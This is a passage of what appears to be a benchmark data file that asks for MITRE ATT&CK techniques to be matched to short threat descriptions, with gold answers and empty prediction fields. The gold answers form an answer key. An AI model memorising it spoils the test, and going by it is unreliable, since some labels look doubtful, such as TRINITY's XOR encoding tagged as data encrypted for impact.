Strider has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.\n\t - T1090.001: Proxy - Internal Proxy\n- Text: For Operation Sharpshooter, the threat actors used the ExpressVPN service to hide their location.\n\t - T1090: Proxy\n", "input": "\nused a proxy server between victims and the C2 server.", "gold": "- T1090: Proxy", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TYPEFRAME has used a malicious Word document for delivery with VBA macros for execution.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Silence has used environment variable string substitution for obfuscation.\n\t - T1027: Obfuscated Files or Information\n- Text: packs a plugin with UPX.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n", "input": "\nThe payload (abbad7acd\u2026) is an executable that appears to have been created by a VBScript to Executable tool and further obfuscated with a cryptor", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KeyBoy has a command to launch a file browser or explorer on the system.\n\t - T1083: File and Directory Discovery\n- Text: WastedLocker can identify network adjacent and accessible drives.\n\t - T1135: Network Share Discovery\n- Text: Palo Alto Networks WildFire observed commands provided by the C2 server for the known Helminth samples. The commands, as seen below, show that the threat actors are attempting to do initial information gathering on the system, including available user accounts, username, computer name, running tasks, services, network services and if remote desktop is enabled.\n\t - T1033: System Owner/User Discovery\n\t - T1049: System Network Connections Discovery\n\t - T1590: Gather Victim Network Information\n\t - T1082: System Information Discovery\n", "input": "\nOpen directory listing of hxxp://stevemike-fireforce[.]info/ Based on the contents and structure of the initial identified open directories, it was possible to find several infrastructure patterns in use", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sharpshooter's first-stage downloader installed Rising Sun to the startup folder \"%Startup%\\mssync.exe\".\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Bisonal has appended random binary data to the end of itself to generate a large binary.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n- Text: Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n", "input": "\nComnie, first named by Sophos seemingly after the Windows LNK file name it created, is a custom malware family that is used in targeted attacks, and has been observed in the wild since at least April 2013", "gold": "- T1036: Masquerading\n- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the domain\u2019s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account\n\t - T1134.005: Access Token Manipulation - SID-History Injection\n- Text: UNC2452 leveraged privileged accounts to replicate directory service data with domain controllers.\n\t - T1003.006: OS Credential Dumping - DCSync\n- Text: Ke3chang has used Mimikatz to generate Kerberos golden tickets.\n\t - T1558.001: Steal or Forge Kerberos Tickets - Golden Ticket\n", "input": "\nMISC::AddSid module can appended any SID or user/group account to a user's SID-History. also utilizes to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain.", "gold": "- T1134.005: Access Token Manipulation - SID-History Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cardinal RAT can uninstall itself, including deleting its executable.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: The wiper module (SHA256: 391e7b90bf3f0bfeb2c2602cc65aa6be4dd1c01374b89c4a48425f2d22fe231c) that the dropper writes to the system is responsible for overwriting the data within the MBR, partitions, and files on the system. The wiper carries out this wiping using a legitimate hard disk driver called RawDisk by ElDos. The wiper contains the ElDos RawDisk driver in a resource named 'e' that it extracts by skipping to offset 1984 and reading 27792 bytes from that offset. It then decrypts the data using aa 247-byte key and saves it to \u2018%WINDOWS%\\system32\\hdv_725x.sys\u2019. The wiper then creates a service named \u2018hdv_725x\u2019 for this driver using the following command line command and runs it with \"sc start hdv_725x\n\t - T1485: Data Destruction\n- Text: APT41 attempted to remove evidence of some of its activity by deleting Bash histories.\n\t - T1070.003: Indicator Removal - Clear Command History\n", "input": "\nDEL Deletes a specified file", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: appears to have functionality to modify remote Registry information.\n\t - T1112: Modify Registry\n- Text: The Zip archive is encrypted with an unknown password, but we know it contains two files named joboffer.chm and thumb.db. The joboffer.chm file is a compiled HTML file that we believe loads and executes the \u2018thumb.db\u2019 file as a payload, but we cannot be absolutely sure as we do not have the password required to extract the files from the archive\n\t - T1218.001: System Binary Proxy Execution - Compiled HTML File\n- Text: A Threat Group-3390 tool can read and decrypt stored Registry values.\n\t - T1012: Query Registry\n", "input": "\nThe majority of ActiveX Objects created with Wscript.Shell and Shell.Application are used to run programs, create shortcuts, manipulate the contents of the registry, or access system folders", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lucifer can use system resources to mine cryptocurrency, dropping XMRig to mine Monero.\n\t - T1496: Resource Hijacking\n- Text: STOLEN INFO\u2019 message \u2013 bot message to C2 with stolen information like passwords, accounts, emails, etc. Stolen information is RC4 encrypted and Base64 encoded. The key for the RC4 encryption is generated in a different way and based on the infected system ID (aka Bot ID) values, and not based on a static string as in the case of traffic encryption\n\t - T1132.001: Data Encoding - Standard Encoding\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Xbash is a novel and complex Linux malware and the newest work of an active cybercrime group. From its characteristics and behaviors, we could realize many trends in current IoT/Linux security battleground\n\t - T1053.003: Scheduled Task/Job - Cron\n", "input": "\nTwo of them are MacOS X User-Agents and the third is a hashed string: Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405 E9BC3BD76216AFA560BFB5ACAF5731A3 Figure 5: SpeakUp `s requests are encrypted with the salted base64 and include the unique User-Agent At the moment SpeakUp serves XMRig miners to its listening infected servers", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Strider has registered its persistence module on domain controllers as a Windows LSA (Local System Authority) password filter to acquire credentials any time a domain, local user, or administrator logs in or changes a password.\n\t - T1556.002: Modify Authentication Process - Password Filter DLL\n- Text: Chimera's malware has altered the NTLM authentication program on domain controllers to allow Chimera to login without a valid credential.\n\t - T1556.001: Modify Authentication Process - Domain Controller Authentication\n- Text: Skidmap has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.\n\t - T1556.003: Modify Authentication Process - Pluggable Authentication Modules\n", "input": "\nharvests plain-text credentials as a password filter registered on domain controllers.", "gold": "- T1556.002: Modify Authentication Process - Password Filter DLL", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The actor has distributed its dropper embedded in an archive file (\uc678\uad50\ubd80 \uac00\ud310 2021-05-07.zip) as an attachment through spearphishing emails. The archive file contains a JavaScript file (\uc678\uad50\ubd80 \uac00\ud310 2021-05-07.pdf.jse) which pretends to be a PDF file that contains two Base64 encoded blobs. The first one is the content of the decoy PDF file in Base64 format and the other one contains the AppleSeed payload also in Base64 format (encoded twice\n\t - T1204.002: User Execution - Malicious File\n\t - T1027: Obfuscated Files or Information\n- Text: APT39 has used malware to decrypt encrypted CAB files.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Once the skimmer has the credit card details, it serializes the copied data into a string and encodes it with Base64. Then, it performs a character permutation on the encoded string to make sure it can\u2019t be directly decoded with Base64 decoding\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", "input": "\nTRINITY malware used by encodes data gathered from the victim with a simple substitution cipher and single-byte XOR using the OxAA key.", "gold": "- T1486: Data Encrypted for Impact", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has been known to use credential dumping.\n\t - T1003: OS Credential Dumping\n- Text: The \u2018vac.dll\u2019 DLL file is signed with a valid, legitimate digital signature, although the file has been tampered with. At first glance, the fact that its digital signature is valid would suggest the file has not been manipulated after being digitally signed\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: Cobalt Strike can spawn a job to inject into LSASS memory and dump password hashes.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", "input": "\nused a signed credential-dumping tool to obtain victim account credentials.", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cardinal RAT injects into a newly spawned process created from a native Windows executable.\n\t - T1055: Process Injection\n- Text: Gelsemium can use custom shellcode to map embedded DLLs into memory.\n\t - T1620: Reflective Code Loading\n- Text: Kobalos is triggered by an incoming TCP connection to a legitimate service from a specific source port.\n\t - T1205: Traffic Signaling\n", "input": "\nWhen, finally, the first stage shellcode receives a special \u201cFF\u201d signal, it then executes the delivered shellcode", "gold": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pupy has a module to clear event logs with PowerShell.\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n- Text: Wevtutil can be used to disable specific event logs on the system.\n\t - T1562.002: Impair Defenses - Disable Windows Event Logging\n- Text: RTM has the ability to remove Registry entries that it created during execution.\n\t - T1070: Indicator Removal\n", "input": "\nIt also deletes Windows Event Logs : Application, Security, Setup, System", "gold": "- T1070: Indicator Removal", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Threat Group-3390 has used the \"net view\" command.\n\t - T1018: Remote System Discovery\n- Text: has the capability to retrieve information about shares on remote hosts.\n\t - T1135: Network Share Discovery\n- Text: Tropic Trooper has tested if the localhost network is available and other connection capability on an infected system using command scripts.\n\t - T1049: System Network Connections Discovery\n", "input": "\ncollects a list of available servers with the command net view.", "gold": "- T1018: Remote System Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks.\n\t - T1592.004: Gather Victim Host Information - Client Configurations\n- Text: SMOKEDHAM has been delivered via malicious links in phishing emails.\n\t - T1598.003: Phishing for Information - Spearphishing Link\n", "input": "\nThis information allows a threat actor to determine if their messages were delivered, which users are more susceptible to opening them, and basic information regarding the target\u2019s operating system and e-mail client (or browser)", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: checks the Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings for proxy configurations information.\n\t - T1012: Query Registry\n- Text: SUGARDUMP can identify Chrome, Opera, Edge Chromium, and Firefox browsers, including version number, on a compromised host.\n\t - T1518: Software Discovery\n- Text: PowerSploit can be used as a tool for the discovery of stored credentials. Specifically it supports the following modules which will check for credentials encrypted or plain-text in various files and in the registry\n\t - T1552.002: Unsecured Credentials - Credentials in Registry\n", "input": "\ncan enumerate registry keys.", "gold": "- T1012: Query Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SUNBURST collected a list of process names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.\n\t - T1057: Process Discovery\n- Text: Once the target\u2019s machine is compromised, the attacker first enumerates all processes running in the system and all services. Then the attacker looks for all administrator accounts on both the local machine and the network. This reflects the Poseidon Group\u2019s familiarity with Windows network administration\n\t - T1057: Process Discovery\n\t - T1007: System Service Discovery\n- Text: BackdoorDiplomacy has used NetCat and PortQry to enumerate network connections and display the status of related TCP and UDP ports.\n\t - T1049: System Network Connections Discovery\n", "input": "\nhas gathered a process list by using .exe.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object\n\t - T1497.002: Virtualization/Sandbox Evasion - User Activity Based Checks\n- Text: FALLCHILL can search files on a victim.\n\t - T1083: File and Directory Discovery\n- Text: With this approach, the luring message shown in the Figure 2 now serves another purpose. Not only does it lure the victim into enabling the macros, but it also is assigned an alternate text: \u201cfkwarning\u201d, as seen in Figure 5. The macro has code to check this attribute to make sure the luring message shape object is present. If this object is not found, the macro will exit without downloading additional payloads\n\t - T1497: Virtualization/Sandbox Evasion\n", "input": "\nchecks its directory location in an attempt to avoid launching in a sandbox.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Exaramel for Linux uses RC4 for encrypting the configuration.\n\t - T1027: Obfuscated Files or Information\n- Text: Ixeshe uses custom Base64 encoding schemes to obfuscate command and control traffic in the message body of HTTP requests.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: During execution, malware deobfuscates and decompresses code that was encoded with Metasploit\u2019s shikata_ga_nai encoder as well as compressed with LZNT1 compression.\n\t - T1140: Deobfuscate/Decode Files or Information\n", "input": "\nSome strings are base64 encoded, such as the embedded DLL known as MockDll.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Peirates can gain a reverse shell on a host node by mounting the Kubernetes hostPath.\n\t - T1611: Escape to Host\n- Text: TeamTNT has also been spotted using a malicious Docker image which can be found on Docker Hub to infect its victims\u2019 servers\n\t - T1610: Deploy Container\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: The observed attack technique (OAT) detection indicates that the php-cgi process represents a \u201c/bin/bash\u201d shell\u201dand is directly reading \u201cpasswd\u201d, suggesting that the server might have been compromised\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n", "input": "\nis capable of spawning a reverse shell on a victim.", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Shamoon creates a new service named \u201cntssrv\u201d to execute the payload. Shamoon can also spread via PsExec.\n\t - T1569.002: System Services - Service Execution\n- Text: SILENTTRINITY tracks `TrustedHosts` and can move laterally to these targets via WinRM.\n\t - T1021.006: Remote Services - Windows Remote Management\n- Text: Zox has the ability to use SMB for communication.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n", "input": "\ncan use to execute a payload on a remote host. It can also use Service Control Manager to start new services.", "gold": "- T1569.002: System Services - Service Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RainyDay can download files to a compromised host.\n\t - T1105: Ingress Tool Transfer\n- Text: APT32 has deployed tools after moving laterally using administrative accounts.\n\t - T1570: Lateral Tool Transfer\n- Text: BabyShark has used mshta.exe to download and execute applications from a remote server.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n", "input": "\n2 Downloads a file to the system", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SeaDuke uses an event filter in WMI code to execute a previously dropped executable shortly after system startup.\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n- Text: For all non-removable drives on a victim, USBStealer executes automated collection of certain files for later exfiltration.\n\t - T1119: Automated Collection\n- Text: First-stage analysis . When the user opens the phishing email, it presents a Spanish social engineering message (\"Payment: Find scheduled payment dates attached\"). The figure below shows a screenshot of one of the emails we looked at. It decrypts the URL for the second-stage from hardcoded bytes, saves it to the \"Templates\" folder, and executes it. Second-stage analysis . The second-stage executable is packed with a Delphi-based packer. The DLL sets a timer, as shown below, which will execute the downloader function periodically. The DLL decodes the hex string using the following steps: We have written a small Python script to decrypt the third stage. The same decryption method was also used to decrypt the hardcoded command and control (C2).The resulting file is also a DLL, which the second stage reflectively loads. Injected DLL analysis (UAC bypass using two techniques) . It checks if `C:\\Windows\\Finex` exists. Decrypting and executing Lokibot . After attempting to bypass the UAC, the third-stage DLL will check if `AutoRunKeyFlag` is set. For this DLL, it is not set. This dropper uses three stages and three layers of encryption to hide its final payload\n\t - T1053: Scheduled Task/Job\n", "input": "\nAfter writing to this file, the Trojan will enter a loop to continually to check for changes to the modification time of this file, effectively waiting for the actor to make modifications to the file", "gold": "- T1070.006: Indicator Removal - Timestomp", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Winnti for Windows can communicate using custom TCP.\n\t - T1095: Non-Application Layer Protocol\n- Text: provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.\n\t - T1205.001: Traffic Signaling - Port Knocking\n- Text: This specific module appears to have been put together from public sources with some added functionality from the attackers. Perhaps the most interesting part here is the unusual command and control mechanism based on TCP/UDP packets, as well as the C&C hostname\u00a0which fits previously known Turla activity\n\t - T1205: Traffic Signaling\n", "input": "\nuses raw sockets to communicate with its C2 server.", "gold": "- T1095: Non-Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CosmicDuke takes periodic screenshots and exfiltrates them.\n\t - T1113: Screen Capture\n- Text: ran a command to compile an archive of file types of interest from the victim user's directories.\n\t - T1005: Data from Local System\n\t - T1119: Automated Collection\n- Text: During Frankenstein, the threat actors collected information via Empire, which was automatically sent back to the adversary's C2.\n\t - T1020: Automated Exfiltration\n", "input": "\nhas a command named $screenshot that may be responsible for taking screenshots of the victim machine.", "gold": "- T1113: Screen Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Figure 4 Microsoft Word attempting to download the remote template If the C2 server is active at the time the document is opened, it will successfully retrieve the malicious macro and load it in the same Microsoft Word session\n\t - T1105: Ingress Tool Transfer\n- Text: Sidewinder has configured tools to automatically send collected files to attacker controlled servers.\n\t - T1020: Automated Exfiltration\n- Text: The configuration data used by the backdoor has the following structure: #pragma pack(push, 1) struct st_cncconfig { _WORD id; _BYTE byte2; _BYTE byte3; _QWORD pCnCBeg; _QWORD pCnCEnd; _QWORD pLastElement; }; #pragma pack(pop) To be able to enter the data into the database, Linux.BackDoor.Fysbis.1 converts the configuration data into the following structure: #pragma pack(push, 1) struct st_crypted_config_data { _WORD id; _BYTE byte2; _BYTE byte3; char* pCnC; }; #pragma pack(pop) Before the configuration data is encrypted with the RC4 algorithm, 11 signature bytes are added to the end of the data (11 bytes are stored in the backdoor's body)\n\t - T1005: Data from Local System\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1560: Archive Collected Data\n\t - T1486: Data Encrypted for Impact\n", "input": "\ndownloads and uploads files to and from the victim\u2019s machine.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their 